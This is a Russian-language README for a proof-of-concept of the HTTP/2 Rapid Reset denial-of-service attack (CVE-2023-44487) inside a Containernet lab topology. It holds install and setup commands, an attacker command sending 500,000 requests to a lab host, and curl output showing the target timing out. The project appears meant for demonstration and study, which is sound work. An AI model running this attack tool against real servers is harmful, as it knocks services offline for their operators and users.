
PoC для уязвимости HTTP/2 Rapid Reset DDoS - CVE-2023-44487
Этот проект демонстрирует атаку типа «Отказ в обслуживании» (DoS) с использованием быстрого сброса соединений HTTP/2 (HTTP/2 Rapid Reset) на пользовательской сетевой топологии, созданной с помощью Containernet. Атака использует уязвимости протокола HTTP/2, чтобы перегрузить целевой сервер и сделать его неотвечающим.

Чтобы установить необходимые пакеты, выполните следующие команды:
./install.sh
Чтобы изменить каталог установки по умолчанию, вы можете изменить переменную INSTALL_DIR следующим образом:
INSTALL_DIR=/custom/path ./install.sh
Чтобы запустить инфраструктуру, выполните следующие команды:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
Чтобы запустить атаку, выполните следующую команду в контейнере атакующего:
./attacker -url='https://modern.art:443/api' -requests=500000
Через несколько мгновений при попытке доступа к сайту с помощью curl он перестает отвечать.
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
Чтобы остановить инфраструктуру, просто введите exit в терминале, где выполняется topo.py.